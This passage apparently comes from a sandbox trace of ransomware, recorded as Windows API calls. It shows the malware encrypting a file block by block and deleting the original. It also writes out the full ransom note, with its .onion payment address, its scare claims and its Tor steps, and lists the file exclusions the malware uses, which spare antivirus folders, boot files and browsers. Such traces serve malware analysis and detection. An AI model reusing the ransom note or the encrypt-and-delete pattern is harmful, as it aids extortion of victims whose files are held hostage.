pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.338] GetLastError () returned 0x0 [0148.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.338] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.338] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.338] GetLastError () returned 0x0 [0148.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.338] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.338] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.338] GetLastError () returned 0x0 [0148.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.338] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.338] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.338] GetLastError () returned 0x0 [0148.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.338] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.338] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.338] GetLastError () returned 0x0 [0148.338] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.338] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.338] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.338] GetLastError () returned 0x0 [0148.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.339] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.339] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.339] GetLastError () returned 0x0 [0148.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.339] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.339] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.339] GetLastError () returned 0x0 [0148.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.339] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.339] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.339] GetLastError () returned 0x0 [0148.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.339] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.339] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.339] GetLastError () returned 0x0 [0148.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.339] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.339] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.339] GetLastError () returned 0x0 [0148.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.339] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.339] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.339] GetLastError () returned 0x0 [0148.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.339] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.340] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.340] GetLastError () returned 0x0 [0148.340] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.340] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.340] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.340] GetLastError () returned 0x0 [0148.340] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.340] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.340] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.340] GetLastError () returned 0x0 [0148.340] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.340] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.340] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.340] GetLastError () returned 0x0 [0148.340] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.340] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.340] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.340] GetLastError () returned 0x0 [0148.340] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.340] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.340] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.340] GetLastError () returned 0x0 [0148.340] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.340] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.340] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.341] GetLastError () returned 0x0 [0148.341] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.341] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.341] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0148.341] GetLastError () returned 0x0 [0148.341] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0148.341] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0148.341] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0148.341] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui")) returned 0x20 [0148.341] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0148.341] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui") returned 1 [0148.341] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui")) returned 0 [0148.342] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui" [0148.342] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK") returned 1 [0148.342] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\.xXB66F.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\.xxb66f.tmp")) returned 0xb66f [0148.343] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\.xXB66F.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\.xxb66f.tmp"), dwFlags=0x1) returned 0 [0148.343] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\.xXB66F.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\.xxb66f.tmp")) returned 1 [0148.343] CryptDestroyKey (hKey=0x9ad438) returned 1 [0148.343] wcslen (_String="OK") returned 0x2 [0148.343] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.343] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.343] CryptDestroyKey (hKey=0x9ad478) returned 1 [0148.343] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0148.343] CryptReleaseContext (hProv=0x8e2f78, dwFlags=0x0) returned 1 [0148.343] FindNextFileW (in: hFindFile=0x9ad778, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0148.343] GetLastError () returned 0x12 [0148.343] FindClose (in: hFindFile=0x9ad778 | out: hFindFile=0x9ad778) returned 1 [0148.343] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0148.344] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0148.346] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0148.346] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0148.346] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.346] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.346] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0148.346] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.346] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*.exe") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*.dll") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*.lnk") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*.bat") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*.ini") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*.msi") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*.scf") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*pagefile.sys*") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*NTUSER.DAT*") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*AppData*") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*\\winrar\\*") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*\\java\\*") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*\\windows\\*") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*\\ESET\\*") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*\\AVG\\*") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*\\AVIRA\\*") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*Atheros*") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*Realtek*") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*bootmgr*") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*boot*") returned 0 [0148.346] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*boot*") returned 0 [0148.347] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*CONFIG.SYS*") returned 0 [0148.347] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*IO.SYS*") returned 0 [0148.347] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*MSDOS.SYS*") returned 0 [0148.347] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*NTDETECT.COM*") returned 0 [0148.347] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*ntldr*") returned 0 [0148.347] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*chrome*") returned 0 [0148.347] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*opera*") returned 0 [0148.347] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", pszSpec="*firefox*") returned 0 [0148.347] wcslen (_String="\\\\?\\") returned 0x4 [0148.347] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad338 [0148.347] wcscmp (_String1=".", _String2=".") returned 0 [0148.347] FindNextFileW (in: hFindFile=0x9ad338, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0148.347] wcscmp (_String1="..", _String2=".") returned 1 [0148.347] wcscmp (_String1="..", _String2="..") returned 0 [0148.347] FindNextFileW (in: hFindFile=0x9ad338, 